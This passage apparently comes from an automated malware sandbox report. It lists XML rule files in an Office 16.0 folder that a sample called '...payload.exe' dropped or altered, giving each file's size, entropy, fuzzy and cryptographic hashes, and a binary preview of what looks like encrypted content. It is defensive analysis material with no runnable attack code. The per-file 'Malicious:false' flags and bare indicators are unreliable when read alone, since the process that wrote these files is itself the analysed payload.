                                                                                                                                                                      Preview:<?xml-.]..!..T.O.=\...R3...Lg.`.g..."1`..[.9".E..^}~..l.[T.N..-.t..... ..;.H...,]O..$....^..`T.!....j<...,.....*...6:8....ZJ...?0.J.(.(...i.1..]...7.k.......Gv.........:L..2.......p.....m)..+u.E.j..e&..vP-i~i.&.].z.*%]...xi.l..#Z.y6..,.o.....k........X..ti...=....4.$B..m...3...a.[k..X..&0.._.$J..6Vk.g.....c....2........Q@..t.Hn...J7,....q=..p..h.62.R*,(i!U..H.....*.3v];ZA-...9..O/.Qc.....'.^`....v......{Q.n,{(R@.P..=h5~....U.n~}.....@...Y..a6...[\.....r....QTw.<...B..!g.x...w0..FA....*n.......6........0+{..o..B...%."...@..;..e:...D.`b..Y.p...g..N.D...`..o.|.Q`W.gE...x....=X...@W{K.."L8w.....r.B...+....+Y$.'......=}*..\P...Ag.S....1}.u=0%.Z.=..*...(..|..^.... -....Aw.....D.v.1.oi../......WX.F...Ih?.Y...1...LUD.......Bm..g%.....*....2...H...1.s...I.....j...)..X........75...G..*.j.w......-.Mh.k.?5cNY....J..6.#.....!..sg.*.n.|.`..M....U.PCk.......yn...]..1X.7..V..z8......Y.lt......d^.....5.F... ...=kw2....w.~J).*.C...M.'.O>$L.>.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703400v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1721
                                                                                                                                                                      Entropy (8bit):7.905300436519466
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:nUY+gMxTbeIQYHrjlkOrHayWQd95WLfCI8G8HD:sFQYHr5kw6Id9sfCBD
                                                                                                                                                                      MD5:A973D95B6C2C561E81EE1B5FCC3C9D58
                                                                                                                                                                      SHA1:1C9C1480FB52DAAB5EDFE1774F340BC304BEBDEB
                                                                                                                                                                      SHA-256:3F637227DE6ED04CC82AECD0ACDAA5A51D8EA0FD7265718C8A09E80450ACF5D5
                                                                                                                                                                      SHA-512:CD38D95F3D1DCC4D4E9E8231001FA7F80DC23B2A4DA74AE249A38999E2559FE9091625E3AC1C37B0515A4335D298D4E6A151716C01C55B38B7CDD2FC39F22052
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.Dk...,.2. ..I...l4..}J.$.e...T....8w..#....@U....Wf.......in[-t...A.kt..N...u...........eC..@...5..@.....s&......E.5.s.`....MS.fC.&."..h.f...,M..W$...P.d..5}..u.....N.e..@.....+.qF..a......<w....=Fk..w.'..-..E0*9I....g..2.'...;+.)...i...R...S.FQ..y.H.z{...3.U6....`..o..!...........I.m.v..BXd...`.Q...L.D]..&.S..8M*..#.......Yq.A..3...H......t..68.....'<../.Y...!a.]..'..F..N..y....[..`+.~.w.9.|\Q.......-.L)../.X+........J.4FW......../...S,.3..%..J.;......C.xJ..IBZ...........=3..&...9*.B..6.{3,..b...}..g.r.?B.L.......|.k . .R]......h.."G`......|a.ekM.]ET.f..mO..G.'^.h....M.n4].o.B>.>.^.7.2.1.e7..Ui..9$=.].G.....3..c...z..~c...va.%....z7..*2}.O..)..0W....d....y..K....}.c@...MU...".n../.u^.........L.XuP..fG|-Wih.W...I.S....>V.............B....h.n..'9.....4...*..q...,.-!~..`._jo.F.;...m_.#....:....gXUeo...@...WE.^%...@..c...$.......\........"9.....O...[.n,........i.m...F60........(cR.L...M..'b^_.h.5:~K.....l;...d..X..fX0DLp..........

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703401v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1758
                                                                                                                                                                      Entropy (8bit):7.9049999887526425
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:y4vxKXdRvEI8SY+bH5vQL43E+XNzptvPZ42vihEnY91TERESWFOxEMZBewje25GC:yXXrv4SY14zXP6HF7EHUwDBBeVrOD
                                                                                                                                                                      MD5:410512FD05028F88AB8787F279B99459
                                                                                                                                                                      SHA1:C205C9D9206FEA575A66D844901E1D239FE23D51
                                                                                                                                                                      SHA-256:D3699F6766F7CDE8A7F53795F3A67CBDD8F1A28F4308025D12EF1D8F0C2C0C3C
                                                                                                                                                                      SHA-512:7714E7861B9C04C2A9723CC90A47FF02D0535C257BB968F1676807ECC99D488BA30E48C6E449E78DB5AE0B3ACD6A40EE7604C2E370DE959A2D47F30D2E93ACB1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..j...-.qV........C..g....Yd..+..0.<-{... ....W}?qGj...oa..Wi..2...>........L.....^...%..91..._...?.......:......7.n.J...X..P.H......u...92....X...V"]....h..bt..&..Se...CT..o.it.. ..;P........?...Op!.....E.2{..A.~..l..w..)&p..C.o.h2.@4...Q....!.*.-Ze.Y&.....|X.bm..2...E.3..X...(|>I.....Xm........g...{O.ff....q.....#.....I.....x..c....~p.|g}.`.._...TQ.Q.v..5.../.Y.(...[r!t4rlI...,..{....e.;...#=7..e.........i..a.%..._....y.@[[..9....2ov...6wx..>..B..A.`. ....nL.C.r..........0z%..w.U..8._#;>.W8m...GVV.......W~N.b.En.=....8I./.Av.?............N}..8...1...q(..l.N...b.e..^].'.....s.WlX.$..K>.b...A..h".....r...?..~=.....z":_.H`...a..[....G!d=L..[Q..\..."h... |].BW..x..%...MG..F..Xd....k..4..;Sq.....q...%P...:.&.....1.<..'_~....j....>4..&.p..'Hg...Y.....].....5...0..e...._.b..lgTD".1....m>.^w_.HI{.......x...W..1..v..O...2.Jr.}..^.....J.b.y.SwNM`....m.IS?.t.=b..Ol<s....X..6Up....$..6>...."./S-...............KA...m..7./.m.O..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703450v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1705
                                                                                                                                                                      Entropy (8bit):7.887563965786838
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:iMHhnBgYnehSR9696IPWqcv5HiW1f1NTk3Zz6D:iqhBgYeKG6jJvoYKe
                                                                                                                                                                      MD5:21BEA7176E95F6DBAC2D62E3E479946A
                                                                                                                                                                      SHA1:72F2E4430B8D1CEB8EB9FE91D8B7AE10FDFE03C4
                                                                                                                                                                      SHA-256:01F7FE69123884070B1C02C7FD0B8BE368F4C16EC39800BDA0ACA51D7BAE3762
                                                                                                                                                                      SHA-512:6EFB59A00FB867C427D0FC963A048A9DA847AB8AF0FA96C7DD6954697333C4856534633EBA69CF35CBAFF670DA968A73F13DC4EE105D46F3D16B65A9CA2CEEEC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...]?..g.".G..V..H..X....b.;gZ...&...a@KqH.|E.*.s...7..sj.7.1._..%.j.np..kj..3...&...t.g...o.I.......\5..4......G..TLU.37....A...Vz.....l'.t....'...$n....S...%.D....t.iI...,.Fu.;....yP.lg....EW.....5..DQt.V.....[HADy...U..V..0.R.....5..............%..c8+W[.2...^z....kS....=.%D...~o..,(7..._....n.M.a...#..6. A-.2wD...Z*!...Y.v...p=.x-..v..e. ./=..e...`WO.Vths..=_.d:..Y..!_.V.8.dN.?.C+..'..8.3....J77....w....r.S.k.E@....H&?.....H.MT.......QF.y.!..7..........I.<.i.<...l.....;...yVH.N..V.......m.M...2.r..GH...DJk....g....A........3<H./Q.M}..t..2.k2.v_*..wZn.K..L..+%_^..K.6.+......y.....E\d..tp;_.m[....`.t.S...~.'.fD..(......Q..A.j.V.7..Y6a...B.....r#.v...f...8.).5xG....km.m.....7..0...u.J &.....^2h.-.4N.9.b......'g...#.M....w..Q....[j..|.n....',<L.>..j..b...@r.+QJ..s..c.Q0EC.F...Zw.......7..!......=..+d}6......HDGg!n..e^A.=..W..\H...&...N.Rvyn.R....e.%..iD..!...@.]..h..........C.U.A...T..?.9#.Q....k....0..|..O..........._.7..Zf...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703451v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1742
                                                                                                                                                                      Entropy (8bit):7.877792454010329
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:ah2MblFKTkBzXhbhlOcsipTbXROBdNvaeH22bzYSkR2NmD:M1BzXRhAcsgTTGdNSeRzLkR2o
                                                                                                                                                                      MD5:5A9DDA625F229D38BA68BB3B215C8076
                                                                                                                                                                      SHA1:5F5C0999F803119C4CAD35CBCBA6820223BCB5E0
                                                                                                                                                                      SHA-256:06DA1D9DD3C9F332BBEBC815AA1B0633F3BE86D19B27CB7217509D9BA55D4056
                                                                                                                                                                      SHA-512:D642B3FFC8AFBDD91A30D834149BF997B1D46D0B60194A751001709C160E2FFD82D189EA432E196FB06AD956568C983D96B6E33271DACB652DF13EAD1121618D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..1a....ztlWv.o.......r...Y.7..?.u.DXH.........I..Z.."D.4;....9.....e........_V..(..&..R.I.i....&...:.....M.....f.9D.9.^......G...S.<.rX...DM.s..@./.U...R....c.......n......v;.<.7f..L....s..P...?.Q.J...O)9..N..V=T`...N;.M.m..Qnmg0]...S.o.#B{.2..5.2..ZZ;...D@^.D...^}.;._.W.6.. }.m{PW........Q..._....J..).`=.[..C...._..Q.6yt.;;.4R.....2V....1...(...bQ.k.rB..m....n...B(.Pm.~...0.k1f~b.A1C....Kh...x.a.\..Mc.........|......4.Q.Q.H.]I.l:.T.S...c4h>.u...@..?...w......|.=.5S4....,..3).n.C....l....Z@..L..a..9[...7.Q.{>...X...\.......Q...SYu.........:d|.x..D.5!.^..b1.98r..y.....E.....v.>..*p>.....-...l...@.U.....'**.O..?.L-.....6...J..Z.M.n.pS2....U....k.,..$..Y....,dM...o..."*#.3../9r..X6.....S:m.........pv.c.RE.6..,..3....}..F>...C.........t.).f...F....8.Y..@>..8s..1[od....2.xo+...Pb^f.....O"H..~G..$.j.YIOr....lh...wY.........`.....2....`.W_................i;.k8:~1.......&..G..O..n`]......poL.A.5.z..x....C$...W.@.".p.{Q...J+.uG1

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703500v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1695
                                                                                                                                                                      Entropy (8bit):7.86185382151714
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:JBV0jo+FbqY9JMPaPASW2JvF8U+c5Kn/iuD:JBeqY9yaPbRJvHLK/f
                                                                                                                                                                      MD5:8A3285CBE430684C42C5C99FE59641EC
                                                                                                                                                                      SHA1:AF5F513083091D7A06AC83582624BDDC46BD6332
                                                                                                                                                                      SHA-256:91D784B3EA9155DCD7C1F5138B9670FB41C630B318853229D3EAA08CD740D679
                                                                                                                                                                      SHA-512:63A920CDF6E2268C31C77E296374B37166E33EACD982B5CF04CCFD919D575E93482943CE64377E506B7D1A43AF0B4A1E832DAED9C50339624D66C08D791AC167
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.c.m..a..+z........[..-..<=tps...f..z....&..F.Wg=....G.?...3...{}..c...u....@&...y}.m.kh...........l^H._`.l.9...]...I5.6g...Q...9.db.>......{......h@..j..z..a..B.*...h}p....Q_a.@WL?.N.h.%...fZ.J.(.f]..b.n._W..p..Aj.s].....9.......j.....k..#......$...E.^......EU."|o.,.;1...>Z.Q.w.8.9.. ..".AE.....1...u.#.i.1_{...<zO..}.2.._......X...dE?....s...;v.`...yM....R.........Z....."...A.;.N2E.?...a...f.d}.#...5..R"......{Yl...C'a.a.cp.Q_...R..>..O$\..46....r.....H.....1...p......t.>..z*.%.h..7.^@o...q...im..l..X8S.........wN..N.JN.@.;.@,g.../.*..s...$.=VZ9.Z.PS......4.\ 7|G..NO.....<....@....L..I....a..F).K.....S.w.[.J`..Y.p.,l....F..b$.........Y.HM..q..^.7....!.R.s.]fF.......ZB..O.(.....H..m.'^...Q+j....a...c.Z....o....*....x.sp..4...13..t.>...fj..B.._.l.(p.MR.E.A.r..kC...x....5..&.`0.5...K.....].R...z.f?.........;....b.Q......;B..L.OB.@.O..*u1.....Z0..1....A...}..<Lb..<..'. l.......)..n..{...a".....9...'..l@..x!..+1A....B.h.....F....8!...1{.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703501v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1732
                                                                                                                                                                      Entropy (8bit):7.893133067192129
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Iiwks4PZZnOkOWg6HFtPUozqVEYqQR3XpWcHGgIJDxFrRq8H2wtF2flYUFhYR/rw:hjzH/sBuYqu3ZWcH8JlKYUFh8/YD
                                                                                                                                                                      MD5:340DC63C1C3C540C4FCB8637196C90EB
                                                                                                                                                                      SHA1:1C97534D93B9E15AE5F862A7D5013253FC1581CD
                                                                                                                                                                      SHA-256:97CD2BC75C7334D6899EB9E8FCE12A31933FF4402746389ADB28F38F48EB229F
                                                                                                                                                                      SHA-512:F3820637F374D0C97392768A58B970FDD8A20089C2A8EB772AEB7DBE806F7BE2F26B4E5747AAA4CFC4CD25EE23A7991A9B483E337820D1CDC632E2DB322A9DF6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml5..Z..6V.p.._......(..6....l./..X*..d.!..A.....%.X.w8..........9.H..e...1r..pR...k........PK1.b1..3....._q...C9.....pA. ".Ma...D.l..n.....n......m.<..0.'L.....(v6""......m.$....nG...^e`w......p.....<..4..#......\.Q.;.0.wq.....g...Iq.'...&.?Z.e....6.J...1.....it.1...w...~}[...@.....i..R...x.JO.<.].#r..BT<a...1.. 6..&e...0XdW......x..I... ....MB!.M.t...H(h..F....D./...H.C..d]FJ...o....Z.3..}..Qi..[..u....Y...F...........;.(.w.G......K.C......7`.K..*.......`..&s.....rD.A3IA.M....._.0..b....H)4.75.....M7m..$.}.*U.!..@..r4..........'..=.o...h.o.A_]W..lz.?..%.P.....5}.#..U._5#...&...A...b.i....*..*u-..!d...o...V..........F...R.{..d....&.;.u:....fb...s..C.a..p.3...]t&.u.h.....D.h.{E.#..jH.Z.)I...p.LJ$\.d....p..o..... ...( 'P..*\.k..Q........Z......T....)kj..E%r..K.Ky ..j.......=..-.(.....f..t",2..ub....k.(..s.r..z$Hp5.W....J....s.S.( h&.(E....%Q&..6....\mZ.......n...#FL.8.^,........).ypK G2.,..@8.m.....V....-...Y.z.......R).

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703550v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1705
                                                                                                                                                                      Entropy (8bit):7.887330843090469
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:2f/0dvtr4jjc1RCClpz6qvq0HR5oleGNShpD:2f/0oj4n16q6leGi
                                                                                                                                                                      MD5:F1CCC8596EE2AAFE33A31643BC0DB4C5
                                                                                                                                                                      SHA1:79510D30425767B969D52C3BD5CEFEC1D89231B5
                                                                                                                                                                      SHA-256:37095ACC76978016E06CFC3A89B86C1014EBBE54DD013E1D52A8D78C9C668590
                                                                                                                                                                      SHA-512:01FBBCDB36F5A5E5DF7BE93800B1D3268C38C02F496BBE88026F5D61D066FD32ADF3B2E72C2856F0099711136D63CB8BF25296B44B85629DAFD7D0345AA1A77A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml[.."."......<VR6..x....m.......5....ZU.':.0PC5..ni.q......x....u,,.'.8Y....r.B.i..&..ULm....W.P......8..~.n...9-:.?...u..E@Ae.1?.\H.N.MG,.'_c.....!..j..R2..Y.K.GY!.W.h.r.F...c.\K2.=......~..Ly...\.N.....i...f..#...*..&...:.2........(.1L..11.F...Vj.b...G.FT.E.A.9H.~..{o.Z..egV....F.d.._....$....M..dB...5.....&.W.......M.L..K..F.A.~4.E~..<Q{....J.o..F;.....&u.....[..'....B..."..l...&..<6..T...ys.....DdF....3.h..5.Y.S..S......*K..O...P.?.l...E.{..A.UP.H.5V.y...d.x..13o.~.C.X.D......i.x.QW%j|..$..z....a.1.T..:.H.WZU9'.............(Fk...)1"..bw......V.].z....H......Vn....X.........%.R...6...(.%..g.r..j'./..l.8..yH.)..2.....k..lR.....zhV..J'..9..y..[y!!.......c..K....._...AS...p.a.l...h..... &Z....y.`.zS..(..}s..`H..H..\AM.zW2!.........T..1F5.Kw].D...Vv...yH..]B...G=..s...Yx.h.s...`.\Z.:.V./...|.k.}.A.:&...'...*...i..`S!....U..a.,.qS......vk...e.98..S\.....h.(+(a.Q.....L..h._)C.z.|......)z=Qb.rF~.K.O.....L.m..8.*..L.iV...N.pi..w... >*q.o..m

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703551v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1742
                                                                                                                                                                      Entropy (8bit):7.90165326886424
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:bvKRdVYX+7TxtNk3O7XrgO926pt5i7TBHMw1JqZD:GRdVYu7TxtNk3O78OM6pthw1JqR
                                                                                                                                                                      MD5:180251E19736872E908E2CA37D690B47
                                                                                                                                                                      SHA1:D4655CC7335B10D4D3ABFE46AE97548E3E498575
                                                                                                                                                                      SHA-256:82B91365583C6537CBDCFB92A1C9D5C1D0F6945FA05A30A6C7D5DD6A0EDCBCB5
                                                                                                                                                                      SHA-512:C1824A804A7D3218D3F6B2CDDEB7CACA8585C007AD092D09AE2F10CCC2048CBA21BC9AB54C5C7A4E3C4002B5C1B38682853FB322C049CEF2CBCED9D0F0C23830
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..L#.. ..>5..!....i.~.*...f....-..E+......7R.Q.....G~LB.ca.[...F...<.<J...qU'....Z....I*..X..+...8M...6A.Zd..C.@.ENy..UNK.x.&2.F..|7&".'.....Dl...l.Y+.j...J..&...6x...........m...~6..t..P.>.....~g..(......>.c.....e.....GE.a..\".&.;.}.m......)%.m.J..~wfO.?[s..@...]L.4=Wy.1.v~.X..5mY.P...?F...'v...P~....Rl.....!x(=?..%H....RV....P....X.so.l.YU.....V........].qc].)-.W{e.....p\....+..- u.)...n.&Q.Cr.pqQ..d..`...B.W7...O}.w'?L.v.@).I..l..H.]+OBbo...?=2+..r...TD->...g...w..Os.(........s."..`.N.C....@..u&.Krm...........BMtKU..|...6.'.o:r0...+.0...v&..<&...0.D.|P..2.X..T.Y...D...D ..;.S..+...H.X.P....!,.hkv...%I.S1.....DL.\.X..;c....6...P.....A0....i..%+..J{r.Kd....v...3.G-S.{...a.2......u.....b.....C............4ql....:;.pN..=4jsT......7........K.J.O.`.....u.{.6.+..8......`.)$..K.H.x..Nx...N..97A7 ..<.N.g..&.^V.g.......(..'....}q.#..B:?...]%..X....s....8.V...RV..7?......:.8.....c........,x.&.t./.%Mp.0..=.k..9W...V.5......T)+. ...k...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703600v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1691
                                                                                                                                                                      Entropy (8bit):7.881497109178326
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:FrKsMLBg6XAjeQI+0atMF4TlRAHRIPhjD:FrKsMNgjjeQbzt9TlMRQF
                                                                                                                                                                      MD5:2A4B0CC7FB2E414A75A3363B5504420E
                                                                                                                                                                      SHA1:2F2155F6D7597B36C9C2E75B261890CBA90F41F9
                                                                                                                                                                      SHA-256:860FB7B070242DD72CC0CF3BE4A4730DEAA1FC37336881AE29BBF8CE930E6E12
                                                                                                                                                                      SHA-512:F96CB8CDB3BDA9A7E4F32202409057422165ABD1C3A24340C39A882B356FBF1A260E151451B39040CA79960D10FC9A3FFFDCE3663704FC33DE87B78D1045F2A6
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.k....>.yb5.0j..`.p..i..... .H..J!.xY..Z...H.... ...+h.....g..4.r..6...X.@M......5(W.jW.....c...<Nt#....s~..GZ.^1.Pt.-......r!..-..}.s..M.R...Zv..b3.l......M......U.Xk..l....)..u.2.7.........ET.O......"@y[.._..?..".;............br.jQ..{..l.*...)...!.\...2...M.%.U...pn..B..:..B...9.p#q.N.1...9.[...&r..T..S ..v...'..9.......4)..m.....1R....34.6.@.....].1.....-..W..5)...!..E.............1..F:........z?...4-%.*.=......+G.o.p+.......v7?.`@..iy.=.Ukk.%...WWD...&!M...._C.....k./D..Y..h.Q..2E......I.L.c...h........M..v..... u....x.r......h8.O.n}..To..A.....$L..S...c.D....I......%"!.n..VO_..O...,.....KF:.p.....dv..I....*......@.&.5=~.:.G....Z..Y...ImJS.U.....f.....!..z.!.>PC%v....Dg...No....1Q...*FqR.V\u.......*y.V.{372.......-.V.we.R....k....cKg...qK.7.........;|.y.U.U....m....b...J<9.k.u....;...I........k.AI.Y.. ....._Q.....;.....&M..Q.@c..}..m..^F..cW..`.........}....h..+..6.........'..d..;>..]..&...9&.......mv..*.Z...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703601v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1728
                                                                                                                                                                      Entropy (8bit):7.891491697414213
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:arTcrtSZLJfbhwOtmQ0072sQk/mssKwHM8oidzefF8iLRAaTzHkWfoME0WmdoK20:7EJhQ2mRtdad8iL+YEjMrWmdoTaFXD
                                                                                                                                                                      MD5:CC18EEC7BB21BE7B2F220F026641EDF0
                                                                                                                                                                      SHA1:23C4B3A06EAE820850997DA796FEF5E11BE6C41B
                                                                                                                                                                      SHA-256:4586371548E9974B7A447CABD1D0B8B10DAE761613C9B0E738C93FF5ACC71A3C
                                                                                                                                                                      SHA-512:C43C73E9AA02F7EB209251E14868D8CD1914FEADF8EC8C1B759E50BAD20EAEABD7FB04DEE25642E7EBC5F0F631B8F4EF0F51CDEBDB727B4FBBCFBF880529603E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...u..;P...8..'g....E~.....D..7.D772..aN.F0..ncKl.....U.wXA....oq#u.0SQ..'...c...B..#...z.).........^.3:.5./S2a.mEB....z..p.q.]..........#n.....C..z.QU........n.D.+.|....r.....I...R....5...=........S4....5F3f..e..1e'.v~..UH./Ue.'...I..."...B......\......[.m.i|.iKd..s.T8g.Q...A.......f..k5.........\:....C5...h..m.....xM&...>.....Hs\..c...I2...pvcv\q0.[B.....:....v...>:`>..d....^r.h...s.....x..G..s:.^........~.....* T....b3.z.].p..7....R\p....NRM6...O....]K.j.y.?.s-.V.8.........B>9{g.K_....3....W.?.xh}._I......j............6.....kK.MO.c.r1|..B.D;.G;.'..0[..s.I.v.d.I...e.u......@.}.`N..+..E..0Ipa.I.....b.. .g=...\..&Y......\q.$T..a.52.>\tDW.u'.....i'x.].IY.K[Ur(f+.V......3.B.t.%MeL\..QD.e.!...$..Y..A|.._....T9H..4dp..#.G8.#.J.E.....R.H....3"._P.o^..#UcoL./.S>.....u.X.......N.I. F.... ......K......e...RHkU..K$O...a.z..L>/......e.?..:............".....9..?..6k.Z.*G.!..=TC..................|)=...G.....J1?.`.]...!r.X.L-e~d.t.h..x.>..W...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703650v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1693
                                                                                                                                                                      Entropy (8bit):7.896280953276181
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:ert5QhoMxD/rQ8dV9Qwf25HRuN2YIfzVIxjwt2wTa7TD:Gt5OoGDE4P7N5IfusnG
                                                                                                                                                                      MD5:BFD85FAA0996CC7D707006AD76F4FFB7
                                                                                                                                                                      SHA1:DDE423A683B26943FA2B9666803C84EF822F05E1
                                                                                                                                                                      SHA-256:CD216301F7F25F43CC070D890BD293B9CFD421321B73B83CBA3AA8CFB4710DFC
                                                                                                                                                                      SHA-512:926C3F4B451ED95B36BA0E82CA2C639FC74EDF1419B7DD29A42CE8165AC58AF26623F79A5F5D8D668738CFA1E7368D94432EF13EF9C67A285E13365E15893A69
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlh..R._.^.qU^..o..n0...r...Js^1...7)...[-_I....J.;.......G.....U...$.[.k'kca.T.(P........G...]...*..z+....22..`:....c(..U..*.d}.._..j...1......"65..U..F....hGH..O.w$.....d.o)..L.L....5!...'..une...)....O............%P!]~...e.K.@.Hc...'.....v..\P.;f ..0..[.?...t..l?....ax...E..6v-.........A.O.E..b#...U...#..:*[..h...G..o.N..R..6^....B9q.-%..a.......4..a..3a....K.0..5.0.VV.^.'...#.V{+b..`.GQ...."..U.L.UG...2..;....:..r.8=5B.i4.C.i.Q...R2....3._...u.%...R.8...."...^.)..4..!..r.H..:]... E.T......g...2.)..kvN.hN.!de.P.p..w\U..f..u.th......Q...^']4Z.....j.dT0.[T...q.L.93N.Z...Q,$.:ub.>..m...qDx..f..2Du97.5.#..(.............q.m7....BjC.5...%.@....wR[.}.'.........c.1w.i..pp.A.Bo`.7...}.8..7+c.....KLV..,q_.f..N....z.uHO........Ji../.&.....p..?<......bjE..T.S.).@ 9".i.;.Mk.1..y..#....N.>._......%K............W|)X.4.l.,.Q-V.0"...=.J..bdp.`...e..{.@...3..-...n^`..#:1jK ^.z..I.=:WA..X..g.....c.......$.th..4G.j?......X.c.0.c...XK....1j

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703651v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1730
                                                                                                                                                                      Entropy (8bit):7.887156938800585
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Dw0Fk16IQIUzazSEpVE0atXNhn+42T0FEgD:80Fk1aO20S0cXvn+SE8
                                                                                                                                                                      MD5:0C05FDE1EFAB567E56569F05191DE5EF
                                                                                                                                                                      SHA1:62C8BCAE15B2AB47BD8F849239F9410C23371548
                                                                                                                                                                      SHA-256:F0593B013B570A645B7102B2304C6945F2AE18140522F15748678E4796C1B674
                                                                                                                                                                      SHA-512:15BFAF6373BB56DE851C66CCB095ECBE9727B453B4EAA9EBCBDA6B0CFF4B357D09B05843A0E64A83C604F477783F76E35F26C3283FBE92DDAF3589615E9A4E51
                                                                                                                                                                      Malicious:false
